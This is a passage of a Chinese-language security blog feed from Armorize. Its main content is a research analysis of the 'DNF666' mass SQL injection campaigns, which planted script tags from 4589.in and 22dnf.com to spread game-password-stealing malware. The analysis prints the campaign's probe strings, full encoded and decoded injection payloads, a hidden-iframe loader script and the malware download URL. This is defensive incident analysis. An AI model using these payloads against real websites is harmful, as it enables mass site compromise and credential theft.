PC, </span><a href="http://www.maximumpc.com/article/news/hacked_web_widget_turned_5_million_sites_malware_carriers"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Hacked Web Widget Turned 5 Million Sites into Malware Carriers</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-17, LA News Monitor, </span><a href="http://www.lanewsmonitor.com/news/Malicious-Network-Solution-Widget-Hacked-Millions-of--Web-Sites-1282057472/"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Malicious Network Solution Widget Hacked Millions of Web Sites</span></a></div></span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1441759431140700676-4729576458237352742?l=armorize-cht.blogspot.com' alt='' /></div><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=R4dE0XCt4fI:f11SUCQ3Es8:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=R4dE0XCt4fI:f11SUCQ3Es8:63t7Ie-LG7Y"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=63t7Ie-LG7Y" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=R4dE0XCt4fI:f11SUCQ3Es8:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?i=R4dE0XCt4fI:f11SUCQ3Es8:V_sGLiPBpWU" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/blogspot/armorize_cht/~4/R4dE0XCt4fI" height="1" width="1"/>Chrishttp://www.blogger.com/profile/01653790213029148763noreply@blogger.com1http://armorize-cht.blogspot.com/2010/08/blog-post.htmltag:blogger.com,1999:blog-1441759431140700676.post-8577511548034378812010-08-06T10:04:00.003+08:002010-08-07T09:14:31.627+08:002010-08-07T09:14:31.627+08:00black hat 與 DEF CON 2010 的投影片與程式碼上線了我們今年在美國駭客年會 black hat 跟 DEF CON 演講的投影片上線了!感謝來聽演講的朋友,謝謝大家的捧場!black hat的演講比較緊張,因為看到台下很多記者,怕會被問一些敏感的問題,所以只好一路把時間用完,然後火速收場。<br /><br />DEF CON 三場就都講得很開心,我主講的 drivesploit ,是我與同事Antonio Roman Fernandez、Fyodor Yarochkin 還有 Chris Hsiao 一起做的,由我與Roman來講。那場人非常的多,一路排到外面去,大家反應也熱烈。這個題目不是很難,講起來還算輕鬆。<br /><br />另一場NoSQL,則主要是Kuon做的,由我來講。第三場0Box,則是Birdman與Benson做的,我先回來了,由Benson講。<br /><br /><a href="http://www.drivesploit.org">drivesploit</a>的程式碼在這邊可以下載:<a href = "http://github.com/waynearmorize/drivesploit">http://github.com/waynearmorize/drivesploit</a><br /><span class="fullpost"><br />感謝大家的支持!<br /><br />Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection (blackhat and DEF CON)<br /><center><div style="width:425px" id="__ss_4875519"><strong style="display:block;margin:12px 0 4px"><a href="http://www.slideshare.net/wayne_armorize/drivesploit-circumventing-both-automated-and-manual-drivebydownload-detection" title="Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection">Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection</a></strong><object id="__sse4875519" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=drivesploitbhdefcon10-100730180829-phpapp01&stripped_title=drivesploit-circumventing-both-automated-and-manual-drivebydownload-detection" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed name="__sse4875519" src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=drivesploitbhdefcon10-100730180829-phpapp01&stripped_title=drivesploit-circumventing-both-automated-and-manual-drivebydownload-detection" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"></embed></object><div style="padding:5px 0 12px">View more <a href="http://www.slideshare.net/">presentations</a> from <a href="http://www.slideshare.net/wayne_armorize">Wane Huang</a>.</div></div></center><br /><br />NoSQL, no SQL injections? (DEF CON)<br /><center><div style="width:425px" id="__ss_4880169"><strong style="display:block;margin:12px 0 4px"><a href="http://www.slideshare.net/wayne_armorize/nosql-no-sql-injections-4880169" title="NoSQL, no SQL injections?">NoSQL, no SQL injections?</a></strong><object id="__sse4880169" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=nosqlnoinjection-20100717kuon-100731184409-phpapp01&stripped_title=nosql-no-sql-injections-4880169" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed name="__sse4880169" src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=nosqlnoinjection-20100717kuon-100731184409-phpapp01&stripped_title=nosql-no-sql-injections-4880169" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"></embed></object><div style="padding:5px 0 12px">View more <a href="http://www.slideshare.net/">presentations</a> from <a href="http://www.slideshare.net/wayne_armorize">Wane Huang</a>.</div></div></center><br /><br />0box Analyzer--Afterdark Runtime Forensics for Automated Malware Analysis and Clustering (DEF CON)<br /><center><div style="width:425px" id="__ss_4880172"><strong style="display:block;margin:12px 0 4px"><a href="http://www.slideshare.net/wayne_armorize/0-box-analyzer-afterdark-runtime-forensics-for-automated-malware-analysis-and-clustering-2" title="0box Analyzer--Afterdark Runtime Forensics for Automated Malware Analysis and Clustering">0box Analyzer--Afterdark Runtime Forensics for Automated Malware Analysis and Clustering</a></strong><object id="__sse4880172" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=0boxanalyzerafterdarkruntimeforensicsforautomatedmalwareanalysisandclustering2-100731184529-phpapp02&stripped_title=0-box-analyzer-afterdark-runtime-forensics-for-automated-malware-analysis-and-clustering-2" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed name="__sse4880172" src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=0boxanalyzerafterdarkruntimeforensicsforautomatedmalwareanalysisandclustering2-100731184529-phpapp02&stripped_title=0-box-analyzer-afterdark-runtime-forensics-for-automated-malware-analysis-and-clustering-2" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"></embed></object><div style="padding:5px 0 12px">View more <a href="http://www.slideshare.net/">presentations</a> from <a href="http://www.slideshare.net/wayne_armorize">Wane Huang</a>.</div></div></center><br /><br /><br /><br /></span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1441759431140700676-857751154803437881?l=armorize-cht.blogspot.com' alt='' /></div><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=A68MgkAZbeA:vOUhtXWQhqE:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=A68MgkAZbeA:vOUhtXWQhqE:63t7Ie-LG7Y"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=63t7Ie-LG7Y" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=A68MgkAZbeA:vOUhtXWQhqE:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?i=A68MgkAZbeA:vOUhtXWQhqE:V_sGLiPBpWU" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/blogspot/armorize_cht/~4/A68MgkAZbeA" height="1" width="1"/>Wayne Huangnoreply@blogger.com0http://armorize-cht.blogspot.com/2010/08/black-hat-def-con-2010.htmltag:blogger.com,1999:blog-1441759431140700676.post-58046699287143046042010-07-02T17:17:00.015+08:002010-07-15T14:28:46.534+08:002010-07-15T14:28:46.534+08:00DNF666 大規模SQL掛馬攻擊又來了:4589.in與22dnf.com(作者:Wayne Huang, Chris Hsiao, Birdman, Wisely Tao, Crane Ku, 以及<a href="http://www.armorize.com/">Armorize</a>其他成員)<br /><br /><br />在6月13日,我們在blog上講述到 <a href="http://armorize-cht.blogspot.com/2010/06/flash-0day-robintus2677in.html">Flash 0day大規模掛馬攻擊研究</a>。根據我們的分析,這一波的攻擊也是由"DNF666"這個團體所發起的。 以下是我們的分析。<br /><br /><br />前一篇 (<a href="http://armorize-cht.blogspot.com/2010/06/flash-0day-robintus2677in.html">查看前一篇blog</a>):<br /><br />5月07日: dnf666.net Mass SQL attack<br />6月04日: Adobe 發佈<a href="http://www.adobe.com/support/security/advisories/apsa10-01.html">弱點通知</a>。<br />6月07日:<a href="http://jsunpack.jeek.org/dec/go?report=7fca0277b807433a437553113bf702160ccb365e">POC code</a>於網路上流傳。.<br />6月08日:<a href="http://research.zscaler.com/2010/06/robintus-case-study-in-mass-website.html">robint.us</a>--第一波大規模掛馬,掛馬本身就是打這個0day。<br />6月10日:有了<a href="https://www.metasploit.com/redmine/projects/framework/repository/revisions/9473/entry/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb">Metasploit 版本</a>。<br />6月11日:2677.in--第二波大規模掛馬攻擊開始。<br /><br />我們把這個攻擊的團體稱之為 "DNF666",Wall Street Journal <a href="http://www.scmagazineus.com/wall-street-journal-others-hit-in-mass-sql-attack/article/172153/">即是被robint.us所打中</a>如同 Jerusalem 所發佈的文章. 而且超過<a href="http://blog.imperva.com/2010/06/latest-robintusujs-infects-114000-victims-analyzed-and-mitigated-1.html">114,000網頁被掛了馬</a>, 而所有的這些主要就是為了散佈惡意程式<a href="http://armorize-cht.blogspot.com/2010/06/flash-0day-robintus2677in.html">盜取亞洲線上遊戲的密碼</a>。<br /><br />而中國、台灣及一些亞洲區的一些網站即是他們鎖定的目標。<br /><span class="fullpost"><br />以下就是他們最近所做的事:<br /><br />6月14日:4589.in--大規模掛馬攻擊<br />6月30日:22dnf.com--大規模掛馬攻擊<br /><br />相似點:<br />1. 同樣的一個團體所為 -- DNF666<br />2. 同樣的掛馬產生器 -- CuteQQ / Anhey<br />3. 同樣的目的 -- 盜取亞洲線上遊戲的密碼<br /><br />不同點:<br />1. 新的SQL injection探測語法<br />2. 伺服端的攻擊目標同時包括ASP及ASP.NET網站<br />3. 客戶端的攻擊鎖定不同的弱點(CVE-2010-0806 and CVE-2010-0249)<br />4. 鎖定亞洲區以台灣為主的網站<br /><br /><b>[1.伺服器端]</b><br /><br /><b>在這兩個嘗試裡,我們看到了新的探測字串</b> (thanks to SmartWAF team Wisely and Crane):<br /><pre class="brush: sql;"><br />' aND '8'='8<br />' aND '8'='3<br />'/**/aND/**/'8'='8<br />'/**/aND/**/'8'='3<br />%' aND '8%'='8<br />%' aND '8%'='3<br />%' aND '8'='8<br />%' aND '8%'='3<br />%'/**/aND/**/'8'='8<br />%'/**/aND/**/'8%'='3<br />' XoR '8'='3<br />' XoR '8'='8<br />' XoR '8'='3<br />' XoR '8'='8<br />'/**/XoR/**/'8'='3<br />'/**/XoR/**/'8'='8<br /></pre><br /><span style="font-family:Courier New;"></span><br />這個SQL injection的技巧是他們經常使用的:<br />4589.in sample:<br /><br /><pre class="brush: plain;"><br />GET /default.aspx?imgbtnlogin=1;dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x6445634C615265204074207641724368417228323535292C406320764172436841722832353529206445634C615265207441624C655F637572736F5220635572536F5220466F522073456C45635420612E6E416D452C622E6E416D452046724F6D207359734F624A6543745320612C735973436F4C754D6E53206220774865526520612E69443D622E694420416E4420612E78547950653D27752720416E442028622E78547950653D3939206F5220622E78547950653D3335206F5220622E78547950653D323331206F5220622E78547950653D31363729206F50654E207441624C655F637572736F52206645744368206E6578742046724F6D207441624C655F637572736F5220694E744F2040742C4063207768696C6528404066457443685F7374617475733D302920624567496E20657865632827557044615465205B272B40742B275D20734574205B272B40632B275D3D727472696D28636F6E7665727428766172636861722838303030292C5B272B40632B275D29292B6341735428307833433733363337323639373037343230373337323633334436383734373437303341324632463334333533383339324536393645324637393631363836463646324536413733334533433246373336333732363937303734334520615320764172436841722835302929207768657265205B272B40632B275D206E6F74206C696B6520272725343538392E696E2527272729206645744368206E6578742046724F6D207441624C655F637572736F5220694E744F2040742C406320654E6420634C6F5365207441624C655F637572736F52206445416C4C6F43615465207441624C655F637572736F523B2D2D%20eXeC(@s)--&txtmh_card=1&txtpass=1&__viewstate=ddwxmzk4nt<br /></pre><br />22dnf.com:<br /><br /><pre class="brush: sql;"><br />GET /default.aspx?imgbtnlogin=1;dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x6445634C615265204074207641724368417228323535292C406320764172436841722832353529206445634C615265207441624C655F637572736F5220635572536F5220466F522073456C45635420612E6E416D452C622E6E416D452046724F6D207359734F624A6543745320612C735973436F4C754D6E53206220774865526520612E69443D622E694420416E4420612E78547950653D27752720416E442028622E78547950653D3939206F5220622E78547950653D3335206F5220622E78547950653D323331206F5220622E78547950653D31363729206F50654E207441624C655F637572736F52206645744368206E6578742046724F6D207441624C655F637572736F5220694E744F2040742C4063207768696C6528404066457443685F7374617475733D302920624567496E20657865632827557044615465205B272B40742B275D20734574205B272B40632B275D3D727472696D28636F6E7665727428766172636861722838303030292C5B272B40632B275D29292B63417354283078334337333633373236393730373432303733373236333344363837343734373033413246324633323332363436453636324536333646364432463636363632463739324536413733334533433246373336333732363937303734334520615320764172436841722835312929207768657265205B272B40632B275D206E6F74206C696B65202727253232646E662527272729206645744368206E6578742046724F6D207441624C655F637572736F5220694E744F2040742C406320654E6420634C6F5365207441624C655F637572736F52206445416C4C6F43615465207441624C655F637572736F523B2D2D%20eXeC(@s)--&txtmh_card=1&txtpass=1&__viewstate=ddwxmzk4nt<br /></pre><br />解碼後, 4589.in:<br /><br /><pre class="brush: sql;"><br />get /default.aspx?imgbtnlogin=1;declare @s varchar(8000) set @sdeclare @t varchar(255),@c varchar(255) declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open table_cursor fetch next from table_cursor into @t,@c while(@@fetch_status=0) begin exec('update ['+@t+'] set ['+@c+']=rtrim(convert(varchar(8000),['+@c+']))+cast(0x3c736372697074207372633d687474703a2f2f343538392e696e2f7961686f6f2e6a733e3c2f7363726970743e as varchar(50)) where ['+@c+'] not like ''%4589.in%''') fetch next from table_cursor into @t,@c end close table_cursor deallocate table_cursor;-- exec(@s)--&txtmh_card=1&txtpass=1&__viewstate=ddwxmzk4nt<br /></pre><br />22dnf.com:<br /><br /><pre class="brush: sql;"><br />get /default.aspx?imgbtnlogin=1;declare @t varchar(255),@c varchar(255) declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open table_cursor fetch next from table_cursor into @t,@c while(@@fetch_status=0) begin exec('update ['+@t+'] set ['+@c+']=rtrim(convert(varchar(8000),['+@c+']))+cast(0x3c736372697074207372633d687474703a2f2f3232646e662e63 6f6d2f66662f792e6a733e3c2f7363726970743e as varchar(51)) where ['+@c+'] not like ''%22dnf%''') fetch next from table_cursor into @t,@c end close table_cursor deallocate table_cursor;--exec(@s)--&txtmh_card=1&txtpass=1&__viewstate=ddwxmzk4nt<br /></pre><br /><br />沒有發現什麼新的SQL injection攻擊技巧,不過這一次這個團體有:<br /><br /><b>A. 使用新的探測技巧。<br />B. 鎖定有弱點的IIS+ASP 及 IIS+ASP.NET 網站。<br />C. 鎖定亞洲區以台灣為主的網站。</b><br /><br />4859.in SQL injections來自IP: <b>95.211.130.71</b>, 反查指到那個網域: <b>4859.in</b>,和<b>iamcome.in</b>. iamcome.in 是在<a href="http://armorize-cht.blogspot.com/2010/06/flash-0day-robintus2677in.html">上一次的攻擊中</a>被DNF666團體所使用的<b>而這是第一個線索指出這兩個攻擊是跟DNF666團體有關。</b><br /><br />22dnf.com SQL injections 來自<b>204.74.216.42</b>這個IP,它是一家位於北京rashost.com所擁有的(DNS: 204-74-216-42.vps.rashost.com). <b>而這個名為"22dnf"(同樣含有"dnf")為第二個線索指出這一波的掛馬是跟DNF666有所關連的。</b><br /><br />這裡是被掛馬的一些網站的搜尋畫面<br />4589.in:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_hELDi5B8zOI/TCvzHfF1utI/AAAAAAAACC8/B4k9iGK-SD0/s1600/4589_in_mass_sql_infections.png"><img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; DISPLAY: block; CURSOR: hand" id="BLOGGER_PHOTO_ID_5488747880811707090" border="0" alt="" src="http://4.bp.blogspot.com/_hELDi5B8zOI/TCvzHfF1utI/AAAAAAAACC8/B4k9iGK-SD0/s1600/4589_in_mass_sql_infections.png" /></a><br />22dnf.com:<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_hELDi5B8zOI/TCvzHDQrK2I/AAAAAAAACC0/5wigjJk9X-8/s1600/22dnf_com_mass_sql_infections.png"><img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; DISPLAY: block; CURSOR: hand" id="BLOGGER_PHOTO_ID_5488747873340959586" border="0" alt="" src="http://1.bp.blogspot.com/_hELDi5B8zOI/TCvzHDQrK2I/AAAAAAAACC0/5wigjJk9X-8/s1600/22dnf_com_mass_sql_infections.png" /></a><br />掛馬片段:<br />4589.in (note in the <a href="http://armorize-cht.blogspot.com/2010/06/flash-0day-robintus2677in.html">上次06/11日2677.in所做的</a>這個js 的檔案名一樣為 "yahoo.js"):<br /><pre class="brush: xml;"><br /><script src=http://4589.in/yahoo.js></script><br /></pre><br /><br />而這是昨天的22dnf.com:<br /><pre class="brush: xml;"><br /><script src=http://22dnf.com/ff/y.js></script><br /></pre><br />事實上這一波的攻擊手法幾乎跟上次一模一樣,所以很多網站都是被二度入侵的:<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_hELDi5B8zOI/TCvzH50Q6OI/AAAAAAAACDE/TzXzKQ6Hq0U/s1600/double_mass_sql_injections_22dnf_4589.png"><img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; DISPLAY: block; CURSOR: hand" id="BLOGGER_PHOTO_ID_5488747887985748194" border="0" alt="" src="http://1.bp.blogspot.com/_hELDi5B8zOI/TCvzH50Q6OI/AAAAAAAACDE/TzXzKQ6Hq0U/s1600/double_mass_sql_injections_22dnf_4589.png" /></a><br /><b>[2.使用者端]</b><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_hELDi5B8zOI/TC17zgYxCPI/AAAAAAAACDU/ij6FM1DVfi8/s1600/22dnf_mass_sql_injection3.png"><img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; DISPLAY: block; CURSOR: hand" id="BLOGGER_PHOTO_ID_5489179645631858930" border="0" alt="" src="http://3.bp.blogspot.com/_hELDi5B8zOI/TC17zgYxCPI/AAAAAAAACDU/ij6FM1DVfi8/s1600/22dnf_mass_sql_injection3.png" /></a><br />讓我們把焦點放在昨天的大規模SQL掛馬攻擊上--22dnf.com。 下面是y.js:<br /><pre class="brush: js;"><br />try{__m}catch(e){__m=1;document.title=document.title.replace(/\<(\w\W)*\>/,"");document.write("<iframe src=http://22dnf.com/ff/cc.html width=0 height=0></iframe><iframe src=http://22dnf.com/ff/ie.html width=0 height=0></iframe><iframe src=http://22dnf.com/ff/ad.html width=0 height=0></iframe>");}<br /></pre><br />所以"y.js"載入了3個htmls--cc.html, ie.html,及ad.html.其中cc.html載入cnzz.com來當造訪人次的計數器,而ie.html 則針對漏洞 <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806">CVE-2010-0806</a>, 而ad.html 則是針對另一個漏洞<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0249">CVE-2010-0249</a>.<br /><br />ie.html 結合了一個DOM-based的技巧來規避自動化惡意網頁(drive-by download)偵測機制,就像我們的<a href="http://hackalert.armorize.com/">我們HackAlert</a>.攻擊程序是由DOM物件來觸發:<br /><pre class="brush: xml;"><br /><button id="bo" onclick="payload();" STYLE="DISPLAY:NONE"></button><br />...<br />document.getElementById("bo").onclick();<br /></pre><br />ad.html 結合了一個類似DOM-based的技巧--這攻擊程序 evl() 是由圖片物件以onload事件來觸發:<br /><pre class="brush: js;"><br /><img src="XIGUA.GIF" onload="ev1(event)"><br /></pre><br />而這兩個技巧可以很有效的來打敗,單純以javascript引擎而非DOM來實作的"行為模式"掃瞄引擎 --例如,單純以<a href="http://www.mozilla.org/js/spidermonkey/">SpiderMonkey</a> or <a href="http://www.mozilla.org/rhino/">Rhino</a>的一些實作。<br /><br />而真正的shellcode是被存放在 ff/a.gif 之中--這是一個常見的技術,能讓攻擊更有彈性,同時也是用來規避偵測為其目的。而這個掛馬攻擊很明顯的是由,掛馬工具CuteQQ / Anhey drive-by 套件所製成, <b>而這點成為了第三個線索指出這個這攻擊是由DNF666所為。</b><br /><br />在漏洞被利用成功之後,它的shellcode會來載入s.exe, 之後自202.109.143.79:81/s.txt遠端讀取下載命令。s.txt的內容如下:<br /><br />123<br /><br />http://202.109.143.79:81/ma.exe<br /><br />所以s.exe 會來下載 ma.exe這支惡意程式。<br /><br /><b>[3.實際的惡意程式]</b><br /><br />在我們的分析結果中這個 ma.exe 惡意程式跟我們上次的分析是一樣的,主要就是要來盜取密碼用的,而它主要所盜取的為以下的線上遊戲:<br /><br />aion.plaync.co.kr<br />aion.plaync.jp<br />df.nexon.com<br />maplestory.nexon.com<br /><br /><b>[4.結論]</b><br /><br />這兩個的攻擊都是由DNF666所發起,而他們至少也牽涉三起先前的大規模SQL掛馬攻擊,這是我們的結論。我們再為這波的攻擊做個重點提要:<br /><br />相似點:<br />1. 同樣的一個團體所為 -- DNF666<br />2. 同樣的掛馬產生器 -- CuteQQ / Anhey<br />3. 同樣的目的 -- 盜取亞洲線上遊戲的密碼<br /><br />不同點:<br />1. 新的SQL injection探測語法<br />2. 伺服端的攻擊目標同時包括ASP及ASP.NET網站<br />3. 客戶端的攻擊鎖定不同的弱點(CVE-2010-0806 and CVE-2010-0249).<br />4. 鎖定亞洲區以台灣為主的網站<br /><br />時間表:<br /><br />5月07日: dnf666.net Mass SQL attack<br />6月04日: Adobe 發佈<a href="http://www.adobe.com/support/security/advisories/apsa10-01.html">弱點通知</a>。<br />6月07日:<a href="http://jsunpack.jeek.org/dec/go?report=7fca0277b807433a437553113bf702160ccb365e">POC code</a>於網路上流傳。.<br />6月08日:<a href="http://research.zscaler.com/2010/06/robintus-case-study-in-mass-website.html">robint.us</a>--第一波大規模掛馬,掛馬本身就是打這個0day。<br />6月10日:有了<a href="https://www.metasploit.com/redmine/projects/framework/repository/revisions/9473/entry/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb">Metasploit 版本</a>。<br />6月11日:2677.in--第二波大規模掛馬攻擊開始。<br /><br /><b>6月14日:4589.in--大規模掛馬攻擊<br />6月30日:22dnf.com--大規模掛馬攻擊</b><br /></span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1441759431140700676-5804669928714304604?l=armorize-cht.blogspot.com' alt='' /></div><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=nY8rSHp1Gmo:F9IYLqjQiJ8:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=nY8rSHp1Gmo:F9IYLqjQiJ8:63t7Ie-LG7Y"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=63t7Ie-LG7Y" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=nY8rSHp1Gmo:F9IYLqjQiJ8:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?i=nY8rSHp1Gmo:F9IYLqjQiJ8:V_sGLiPBpWU" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/blogspot/armorize_cht/~4/nY8rSHp1Gmo" height="1" width="1"/>Chrishttp://www.blogger.com/profile/01653790213029148763noreply@blogger.com3http://armorize-cht.blogspot.com/2010/07/dnf666-sql4589in22dnfcom_02.htmltag:blogger.com,1999:blog-1441759431140700676.post-39671564406676821132010-06-17T14:21:00.004+08:002010-07-15T12:26:52.828+08:002010-07-15T12:26:52.828+08:00Flash 0day 大規模掛馬攻擊研究:robint.us與2677.in(作者:Wayne Huang, Fyodor Yarochkin, Aditya Sood, Jeremy Chiu, Wisely Tao, Kuon Ding, Crane Ku, Sun Huang, 以及<a href="http://www.armorize.com/">Armorize</a>其他成員)(英文版在<a href="http://blog.armorize.com/2010/06/recent-evolution-of-mass-sql-injection.html">這裡</a>)<br /><br />最近讀了一些媒體對於此次 Adobe Flash 0day (現在已經<a href="http://www.adobe.com/support/security/bulletins/apsb10-14